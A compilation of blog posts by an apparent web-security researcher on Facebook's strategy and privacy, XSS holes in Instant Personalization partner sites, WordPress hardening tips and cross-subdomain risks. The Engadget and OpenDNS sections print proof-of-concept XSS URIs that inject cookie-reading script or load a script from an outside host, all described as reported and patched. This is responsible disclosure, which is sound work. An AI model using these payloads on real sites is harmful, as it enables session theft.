Looking at Facebook’s Strategy and Possible New Directions

Over the last few months, Facebook has rolled out several significant new features, such as Places and the updated Groups. On Monday, Facebook is holding another event to announce what many expect to be an improved messaging feature. As I’ve watched these changes, I’ve been thinking about where Facebook might be headed.

At first, I started to think Facebook was simply looking to extend its reach by acting as an invisible layer of sorts. Anil Dash once talked about Facebook melting into the larger Web, but perhaps Facebook would end up becoming part of the underlying fabric of the Internet. In past public appearances, Facebook CEO Mark Zuckerberg seemed to be the kind of person who was content to remain in the background, and the company’s strategy seemed to reflect a similar style. I’ve mentioned before the idea of Facebook becoming and identity layer on the Internet, and innovations such as their Graph API have made it easier than ever for sites to integrate with Facebook.

But Facebook’s updated Groups feature changed my perspective, since it added functionality that would drive users back to facebook.com. Of course, the upgrade did enable e-mail as a way of interacting with groups. In some ways, Facebook’s overall strategy could be compared to Google’s. Years ago, many sites focused on “stickiness,” trying to keep users hooked. By contrast, Google drove users away by providing relevant links to other sites. But to see Google as non-sticky would be an oversimplification. In fact, the company built a successful ad network that extended its reach across the web. Also, Google has created a number of other products that many people stay logged into, such as Gmail.

And now, people are expecting Facebook to announce a web-based e-mail client that will compete with Gmail. I’m predicting that Facebook will roll out a new messaging system, but it won’t be a Gmail clone or simply another client for managing traditional POP/IMAP e-mail. That’s not to say there won’t be any e-mail gateway, but I think Facebook’s plans will go much further. I’m guessing that at least part of the new system will involve somehow extending private messaging features across Facebook-integrated websites.

In any event, I think Facebook’s announcement will include at least a few surprises for those who have been discussing the possibilities. Facebook has a history of introducing features that aren’t quite what people expected – and often end up leading to practical implementations of ideas that were previously niche experiments. Personally, I think it’s a bit short-sighted to think that Facebook would simply join the market for web-based e-mail without trying to reinvent it, especially given the service’s cautiousness about past features that allowed or potentially allowed spam-like behaviors.

Facebook has also been accused many times of somehow standing in opposition to “openness.” Personally, I think the term has become a buzzword that’s often used without much specificity. And even though I’ve often been a critic of Facebook, I do think many of the accusations aren’t entirely fair. From RSS feeds to developer APIs, Facebook has opened up data in ways that many other sites can’t claim. Today’s Facebook is certainly far more “open” that years ago – in fact, I would argue that the site has at times been too open lately, such as when some user data became reclassified as “publicly available” last fall. But regardless of Facebook’s degree of openness, the company has always been careful to maintain a high degree of control over information and features on the site. This can be positive, such as quickly removing malware links, or negative, such as controversial decisions to bar users or certain content.

Either way, that control has helped the site build a powerful database of profiles that generally reflects real people and real relationships. That’s part of what fascinated me about the site’s recent spat with Google over contact information. In the past, a list of e-mail addresses was about the only semi-reliable way to identify a group of people across the Internet. Now, many sites rely on Facebook’s social graph for that function. In terms of identity, the value of e-mail addresses has declined, and I don’t think exporting them from Facebook would provide as much value as Google might think. On the other hand, Google may realize this and be so concerned about the shift that they’re trying to curb Facebook’s influence. This would especially make sense if Google intends to introduce a more comprehensive social networking product that would need e-mail addresses as a starting point. Regardless, I’m sure Google feels threatened by the prospect of Facebook providing a better alternative to traditional e-mail – a change that would only bolster the value of a Facebook profile as the primary way to identify a typical Internet user.

Instant Personalization Program Gets New Partner, Security Issue

Facebook announced last week that movie information site Rotten Tomatoes would join Docs.com, Pandora, and Yelp as a partner in the social networking service’s “instant personalization” program. Rotten Tomatoes will now be able to automatically identify and access public information for visitors logged in to Facebook, unless those users have opted out of the program. This marks the first new partner since Facebook launched the feature earlier this year.

Soon after that initial roll-out, security researchers noted vulnerabilities on Yelp’s website that allowed an attacker to craft pages which would hijack Yelp’s credentials and gain the same level of access to user data. TechCrunch writer Jason Kincaid reported on the cross-site scripting (XSS) holes, and made this prediction: “I suspect we’ll see similar exploits on Facebook partner sites in the future.”

Kincaid’s suspicions have now been confirmed, as the latest site with instant personalization also had an exploitable XSS vulnerability, which has now been patched. I’ll quickly add that Flixster, the company behind Rotten Tomatoes, has always been very responsive when I’ve contacted them about security issues. They have assured me that they have done XSS testing and prevention, which is more than could be said for many web developers. In posting about this issue, I primarily want to illustrate a larger point about web security.

When I heard about the expansion of instant personalization, I took a look at Rotten Tomatoes to see if any XSS problems might arise. I found one report of an old hole, but it appeared to be patched. After browsing around for a bit, though, I discovered a way I could insert some text into certain pages. At first it appeared that the site properly escaped any characters which could lead to an exploit. But ironically enough, certain unfiltered characters affected a third-party script used by the site in such a way that one could then execute arbitrary scripts. Since I had not seen this hole documented anywhere, I reported it to Rotten Tomatoes, and they promptly worked to fix it.

I’ve long argued that as more sites integrate with Facebook in more ways, we’ll see this type of problem become more common. Vulnerable applications built on the Facebook Platform provided new avenues for accessing and hijacking user accounts; now external websites that connect to Facebook open more possible security issues. As Kincaid noted in May, “Given how common XSS vulnerabilities are, if Facebook expands the program we can likely expect similar exploits. It’s also worth pointing out that some large sites with many Facebook Connect users – like Farmville.com or CNN – could also be susceptible to similar security problems. In short, the system just isn’t very secure.”

Overcoming such weaknesses is not a trivial matter, though, especially given the current architecture of how scripts are handled in a web page. Currently, any included script has essentially the same level of access and control as any other script on the page, including malicious code injected via an XSS vulnerability. If a site uses instant personalization, injected scripts can access the data used by Facebook’s code to enable social features. That’s not Facebook’s fault, and it would be difficult to avoid in any single sign-on infrastructure.

Of course, all of this applies to scripts intentionally included in the page as well, such as ad networks. With the Rotten Tomatoes roll-out, Facebook made clear that “User data is never transferred to ad networks.” Also, “Partner sites follow clear product/security/privacy guidelines,” and I assume Facebook is monitoring their usage. I’m not disputing any of these claims – Facebook is quite correct that advertisers are not getting user data.

But that’s due to policy limitations, not technical restrictions. Rotten Tomatoes includes a number of scripts from external sources for displaying ads or providing various functions. Any of these scripts could theoretically access a Facebook user’s information, though it would almost certainly be removed in short order. I did find it interesting that an external link-sharing widget on the site builds an array of links on the page, including the link to a user’s Facebook profile. This happens client-side, though, and the data is never actually transferred to another server.

I bring up these aspects simply to note the technical challenges involved in this sort of federated system. I think it’s very possible that we will eventually see ad network code on a Facebook-integrated site that tries to load available user data. After all, I’ve observed that behavior in many Facebook applications over the last few years – even after Facebook issued explicit policies against such hijacking.

These dangers are part of the reason why JavaScript guru Douglas Crockford has declared security to be the number one problem with the World Wide Web today. Crockford has even advocated that we halt HTML5 development and focus on improving security in the browser first. While that won’t likely happen, I think Crockford’s concerns are justified and that many web developers have yet to realize how dangerous cross-site scripting can be. Perhaps these issues with instant personalization sites will help increase awareness and understanding of the threat.

Postscript: This morning, an XSS vulnerability on Twitter led to script-based worms (somewhat reminiscent of “samy is my hero”) and general havoc across the site. This particular incident was not related to any mashups, but once again emphasizes the real-world security ramifications of cross-site scripting in a world of mainstream web applications.

Update (Sep. 27): Today news broke that Scribd had also become part of Facebook’s Instant Personalization program. I took a look at the site and discovered within minutes that it has a quite trivial XSS vulnerability. This particular issue should have been obvious given even a basic understanding of application security. It also indicates that Facebook is not doing much to evaluate the security of new instant personalization partners. Update 2: Scribd patched the most obvious XSS issue right about the time I updated this post: entering HTML into the search box brought up a page that loaded it unfiltered. Another search issue remained, however: starting with a closing script tag would still affect code later in the results page. After about half an hour, that problem was also patched. I’m glad Scribd moved so quickly to fix these problems, but I still find it disconcerting they were there to start with. I’ve not done any further checking for other XSS issues.

Security Through Obscurity and Privacy in Practice

Yesterday, security researcher Ron Bowes published a 2.8GB database of information collected from public Facebook pages. These pages list all users whose privacy settings enable a public search listing for their profile. Bowes wrote a program to scan through the listings and save the first name, last name, and profile URI of each user (though only if their last name began with a Latin character). The database includes this data for about 171 million profiles.

On the one hand, I wasn’t entirely surprised by this news – it was only a matter of time before someone started building up such a dataset. I’ve previously mentioned that developer Pete Warden had planned on releasing public profile information for 210 million Facebook users until the company’s legal team stepped in. But nothing technical prevented someone else from attempting the task and posting data without notice. I imagine Facebook may not be too happy with Bowes’ data, but I’m not going to delve into the legal issues surrounding page scraping.

However, the event did remind me of a related issue I’ve pondered over the last few months: the notion of “security through obscurity” as it relates to privacy issues.

I’ve often referenced the work of danah boyd, a social media researcher that I highly respect. In a talk earlier this year at WWW2010 entitled, ”Privacy and Publicity in the Context of Big Data,” she outlines several excellent considerations on handling massive collections of data about people. One in particular that’s worth remembering in the context of public Facebook information: “Just because data is accessible doesn’t mean that using it is ethical.Michael Zimmer at the University of Wisconsin-Milwaukee has made similar arguments, noting that mass harvesting of Facebook data goes against the expectations of users who maintain a public profile for discovery by friends, among other issues. Knowing some of the historical issues with academic research involving human subjects, I tend to agree with these positions.

But a related point from boyd’s talk concerns me from a security perspective: “Security Through Obscurity Is a Reasonable Strategy.” As an example, she notes that people talking in public settings may still discuss personal matters, but they rely on being one conversation among hundreds to maintain privacy. If people knew other people were specifically listening to their conversation, they would adjust the topic accordingly.

In this “offline” example, taking advantage of obscurity makes sense. But boyd applies the same idea online: “You may think that they shouldn’t rely on being obscure, but asking everyone to be paranoid about everyone else in the world is a very very very unhealthy thing…. You may be able to stare at everyone who walks by but you don’t. And in doing so, you allow people to maintain obscurity. What makes the Internet so different? Why is it OK to demand the social right to stare at everyone just because you can?”

I would respond that at least three aspects make the Internet different. First, you rarely have anyway of knowing if someone is “staring at you” online. Public content on Facebook gets transferred to search engines, application developers, and individual web surfers every day without any notification to the creators of that content. Proxies and anonymizers can spoof or remove information that might otherwise help identify the source of a request. And as computing power increases each day, tracking down publicly accessible resources becomes ever easier.

Second, the nature of online data means that recording, parsing, and redistributing it tends to be far simpler than in the offline world. If I want to record someone’s in-person conversations, it’s theoretically possible that I could acquire a small recording device, place it in a convenient location, save the audio from it, type up a transcript of the person’s words, then send it to another person to read. But if I want to record someone’s conversations on Twitter (as an example), I can have all them in a format understandable to various computer-based analysis tools in just a few clicks. In fact, I could setup an automated system which monitors the person’s Twitter account and updates me whenever certain words of interest appear. Add the fact that this is true of any public Twitter account, and the capabilities for online monitoring grow enormously.

Finally, while digital content is in some ways more ephemeral than other media, web data tends to persist well beyond a creator’s ability to control. Search engine caches, archival sites, and user redistribution all contribute to keeping content alive. If someone records a spoken conversation on a tape, the tape can be destroyed before copies are made. But if you (or a friend of yours) post a sentence or photo on a social networking site, you may never be able to erase it fully from the Internet. Several celebrities have learned this the hard way lately.

From a privacy perspective, I wholeheartedly agree with boyd that we can’t expect users to become paranoid sysadmins. The final point of my own guide to Facebook privacy admonished, “You Have to Live Your Life.” But from a security perspective, I know that there will always be people and automated systems which are “staring at you” on the Internet. I’ve seen time and again that if data is placed where others can access it online, someone will access it – perhaps even unintentionally (Google indexes many pages that were obviously not meant for public consumption).

In my opinion, the only way to offer any setup online which resembles the sort of “private in public” context boyd described requires some sort of a walled garden, such as limiting your Facebook profile to logged in users. That alone still doesn’t provide the same degree of privacy, since many fake profiles exist and applications may still have access to your data. But while “security through obscurity” (or perhaps more accurately, privacy through obscurity) may be a decent strategy in many “offline” social situations, it simply can’t be relied on to protect users and data online.

Facebook users are starting to discover this firsthand. I’ve seen several reactions to Bowes’ release that characterize it as a security issue or privacy issue, and people have seemed quite surprised that building such a dataset was even possible. Yet it really shouldn’t come as a surprise to someone familiar with current technology and ways of accessing Facebook data. And it won’t be the last time we see someone make use of “public” data in surprising ways. Some of these uses may be unfortunate or unethical (see above), but we’ve often seen technology steam ahead in pursuit of fortune, and the web has many users with differing ideas on ethics. Reversing the effects of such actions may prove impossible, which is why I would argue we need to prevent them by not trusting obscurity for protection. And how do we balance this perspective to avoid unhealthy paranoia? I’m honestly not sure – but if content is publicly accessible online without any technical limitations, we can hardly consider it immune to publicizing.

Secure Your WordPress By Learning From My Mistakes

Several weeks ago, I managed to create a small ruckus on Twitter by issuing a warning about a possible WordPress vulnerability. I was rather embarrassed to eventually discover that the actual problem related to a backdoor still on my server from a previous hack. This was not my first lesson in WordPress security, but it was certainly a memorable one.

I first created this blog in 2007 after finding basic CSRF issues in the first publicly available OpenSocial application. At the time, I admittedly knew very little about application security (not that I know much now!), but I was interested in many aspects of building online social networking systems, and that led me to research security issues more and more. Over time, this blog grew and several other projects hosted on the same server fell by the wayside. As my understanding of security also grew, I found some of my sites hacked a few times, and I undertook a number of steps to secure this WordPress installation.

That maintenance contributed to the confidence I had in my warning on Twitter – malicious scripts kept popping up in my site’s footer, and the only apparent problem were some suspicious requests to a particular WordPress interface. I had looked gone through all my plug-ins (the apparent source of previous attacks), double-checked my permissions, changed passwords, etc. I finally did a thorough sweep of every single folder on my site, and lurking in an upload folder, I found a sophisticated PHP backdoor.

I’m guessing that file originally been placed during a much older attack and I’d simply missed it until now. Since deleting it and taking even more steps to protect my blog, I’ve not had any more trouble. I wouldn’t presume to think this site is 100% secure and I’ve never claimed to be an expert on application security, much less WordPress or PHP security, but I’m now quite confident that I’ve taken enough precautions to avoid most attacks.

That leads me to the following list of steps I’ve performed to harden this particular WordPress site. If you’ve not taken the time to ensure your blog is secure, this may be a good guide for you to start with. I’m indebted to many websites on WordPress security, and while I would want to link to all of them, I’m honestly not sure of all the specific ones I’ve drawn from and it would take a while to piece them together. A quick search will bring up many helpful recommendations, and I encourage you to check them out in addition to these tips.

  • Stay updated. Running the most current version of WordPress is probably the most important step. My host offers automatic updating for my installations. Also, be sure to keep your plug-ins updated as well.
  • Protect other sites. If you have more than one website running on the same server, make sure all of them are secure. One vulnerable application can compromise others. If you have sites that you don’t maintain, consider deleting them or locking them down to avoid future problems.
  • Scan through all of your folders. If you haven’t done this in a while, now would be a good time. Look through what files are present and keep an eye out for anything suspicious. Check your WordPress files against a fresh download to make sure they line up.
  • Scan through all of your permissions. This should be fairly easy with an FTP program that displays permissions settings. With rare exception, I keep files at chmod 644 and folders at chmod 755.
  • Periodically change passwords. Definitely modify your passwords if you’ve recovered from an attack. Remember to change your database password (and corresponding line in wp-config.php) as well as account passwords.
  • Use modified passphrases. This is one tip I don’t see often, but it’s one of my favorite tricks. Rather than simply jumbling characters into a password you have trouble remembering, start with a sentence. Not something terribly common, but something familiar to you. Pick one with at least six words in it. Take the whole sentence, with capitalization and punctuation, and add some complexity – append some numbers and punctuation at the beginning or end, and maybe change a few letters to numbers (such as “3″ for “e”). You should then have a very strong “password” that’s much easier to remember. Many websites and applications will let you use spaces and hundreds of characters in your password. But once again: avoid common phrases, include at least six words, and don’t just use a sentence without adding some numbers and special characters.
  • Check your users table in the database. I’ve seen attacks before that lead to the creation of an administrative account which is then hidden from the list of users in the web-based control panel. I’ve never quite understood why hidden users should be allowed, but that could be part of the attack to begin with. Anyway, just to be careful, I like to look at the actual table in the database and see if any other accounts have administrative privileges.
  • Double-check and clean up all plug-ins. I’ve deleted every plug-in I don’t use, and I try to keep all of my active plug-ins current. If you have a plug-in that’s no longer maintained or hasn’t been updated in a long time, you should probably check and see if a newer replacement is available. In my experience, plug-ins can be one of the weakest points in your WordPress installation. It’s kind of like a certain other site I know well – Facebook itself tends to be pretty secure, but you can often access data through vulnerable Facebook applications.
  • Add HTTP authentication to your wp-admin folder. This is covered in many places online so I’ll not recap specific steps here. And I’ll add that I realize this is not a silver bullet – basic authentication sends passwords in cleartext (so don’t use the same credentials as your WordPress account), and the traffic is not encrypted if you’re not using SSL/TLS. But adding another login prompt for the admin panel adds friction and may repel less-determined attackers. (This tip is obviously geared towards those who don’t have user accounts for non-admins.)
  • Move wp-config.php to a folder not as easily accessible. You can place wp-config.php one folder above your WordPress install; under my hosting setup, this location does not correspond to any public website folder. I also set mine to chmod 644 after changing it.
  • Rename your admin account. Several means exist to do this; I simply edited the record in the database.
  • Change your table prefix. This can be a bit of a hassle, but plug-ins exist (see below) to help. I’ll admit that I still need to check this one off my own list; long story.
  • Disable interfaces such as XML-RPC if you don’t use them. I don’t doubt that the programmers behind WordPress have worked hard to secure these interfaces, but I simply don’t like having another avenue of accessing administrative functions. And I think it’s not a bad idea to disable features you don’t actually need.
  • Use security tools. I installed the WP Security Scan plug-in after reading about it on WordPress’ own hardening guide.
  • Keep monitoring your site. I make a habit of loading up my homepage ever so often, hitting “View Source,” and scanning through the HTML. If I ever see an unfamiliar script or iframe element, I look closer.

That’s my personal list of WordPress security tips, based on many helpful resources and my own experiences of getting hacked. These certainly don’t apply to everyone, more could be added, and your mileage may vary, but hopefully this will help others avoid some of the problems I encountered. Be sure to look at other people’s advice as well and watch out for any WordPress security news.

XSS in Engadget’s New Site

I’m noticing a trend of sites patching the more obvious cross-site scripting vectors, such as search fields, but ignoring parameters in secondary pages, such as Ajax interfaces. Several applications in the Month of Facebook Bugs had pages for making Ajax calls or loading advertisements that were never meant to be loaded directly, yet doing so opened the door to XSS attacks. Keep in mind that any page on a given domain can access that domain’s cookies.

Yet another case in point came to my attention this week. I noticed that the technology news site Engadget had launched a redesign, and I began poking around the new site. After a little while, I came across four XSS vulnerabilities, all on the main www.engadget.com domain. I promptly reported the holes and they were silently patched in less than a day or two. Since they’ve all been fixed, I’ll list the example URIs I sent here for the record:

  • http://www.engadget.com/?a=ajax-comment-vote&commentid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  • http://www.engadget.com/?a=ajax-comment-show-replies&commentid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  • http://www.engadget.com/?a=ajax-comment-report&commentid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  • http://www.engadget.com/mm_track/Engadget/media/?title=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Previously, each one of these pages loaded the inserted script, which brings up an alert dialog containing the user’s cookies for Engadget. Kudos to the team behind Engadget for the quick fixes, and hopefully this will serve as another reminder to all developers to leave no page unchecked when evaluating security issues.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Real-Life Examples of Cross-Subdomain Issues

About two weeks ago, security researcher Mike Bailey posted a paper on cookie attacks via subdomains (hat tip: Jeremiah Grossman). I’ve seen several stories since then dealing with various subdomain security issues. In fact, the day after Bailey’s write-up, Yvo Schaap described several cases where Facebook and MySpace inadvertently exposed data through trust policies on particular subdomains.

I bring up subdomains to highlight two important considerations for developers. First, never ignore code hosted on subdomains. Your primary site may be secure, but vulnerabilities on one of your subdomains could still open you up to attacks. Second, make sure you understand how browsers handle subdomains. While generally subdomains are generally treated as separate from their parent domain, remember that changing document.domain can allow code to move up the DNS chain.

While Schaap illustrated the first point already, I can add one more example. A few weeks ago, I poked around a few OpenDNS pages, and noticed an oversight similar to some of the FAXX hacks I’d seen in September: an AJAX interface called directly rendered a good bit of HTML. While mostly filtered, I did come across one parameter that could be used to render injected code. The vulnerable page was hosted on guide.opendns.com, a subdomain used for presenting search results: http://guide.opendns.com/ajax_serp.php?q=&oq=><script src%3Dhttp://theharmonyguy.com/opendns.js></script>

OpenDNS patched this hole quickly after I disclosed it to them, and I doubt it would have had much serious impact. Any important cookies appear to be attached to www.opendns.com, which would not be accessible, and trying to change network properties would require accessing OpenDNS pages on HTTPS (and thus blocked by the browser).

I came across a striking example of my second point while reading about a new Twitter widget. A ReadWriteWeb reader commented that users of NetVibes, a custom home page service, could make use of the widgets by inserting them into an HTML widget available on NetVibes. I knew that the Twitter widgets required JavaScript, so I started testing NetVibes widgets in much the same way I looked at Google Wave gadgets.

Sure enough, NetVibes allowed JavaScript and iframes to be inserted into their widgets, though they again render in container iframes. More troublesome, though, is that these container iframes do not load in an entirely separate domain – they load in a subdomain of netvibes.com. Within minutes, I changed document.domain to netvibes.com and loaded the cookies associated with that domain. Thankfully my login cookies appear to only be tied to www.netvibes.com, and trying to load pages using URIs that don’t include “www” get forwarded to www.netvibes.com pages. Still, as much as I’ve criticized Google Wave’s gadget implementation, at least Google used a domain entirely separate from google.com for their gadgets. Finally, I would note that I could add potentially malicious NetVibes widgets to publicly accessible NetVibes pages, leading to persistent XSS issues.

As Bailey pointed out in his paper, “DNS was never intended to be a security feature.” Even with protections such as same-origin policies, I get a bit leery at times at how thin the walls preventing certain attacks can become. When building secure web applications, remember your subdomains and how they relate to each other.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark